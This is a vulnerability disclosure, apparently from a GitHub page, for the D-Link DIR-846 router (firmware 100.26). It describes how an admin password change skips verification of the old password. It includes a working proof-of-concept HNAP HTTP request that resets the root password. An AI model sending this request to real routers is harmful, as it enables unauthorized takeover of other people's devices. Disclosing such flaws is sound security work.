D-Link DIR-846 Bypass the original password verification, modify the administrator password

vender ：D-Link

Firmware version:100.26

Exploit Author: bigbear@galaxylab.org

Vendor Homepage: http://www.dlink.com.cn/

Hardware Link:http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-846

Vul detail

Reproduction Steps:

Go to your wi-fi router gateway [i.e: http://192.168.0.1]
login with admin
Send http request with admin cookies
the original password verification request and the password change request are sent separately, not related to each other.you just need send the password change request to change admin password. POC:

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetPasswdSettings"
HNAP_AUTH: D34C44D78E0DA072AE4E94B67361E182 1534384217127
Referer: http://192.168.0.1/account.html
Content-Length: 58
Cookie: loginpass=202cb962ac59075b964b07152d234b70; PHPSESSID=e5c635efde382dd2dd21a62b6649278f; uid=ac08Gage; PrivateKey=D7D42B5B2E20D9F30C0D44920DC56A58
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close

{"SetPasswdSettings":{"system_root_password":"123456789"}}

The vulnerable code is in file /squashfs-root/www/HNAP1/control/SetPasswdSettings.php.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

D-LINK DIR846 auth change admin pass.MD

D-LINK DIR846 auth change admin pass.MD

D-Link DIR-846 Bypass the original password verification, modify the administrator password

Vul detail

Files

D-LINK DIR846 auth change admin pass.MD

Latest commit

History

D-LINK DIR846 auth change admin pass.MD

File metadata and controls

D-Link DIR-846 Bypass the original password verification, modify the administrator password

Vul detail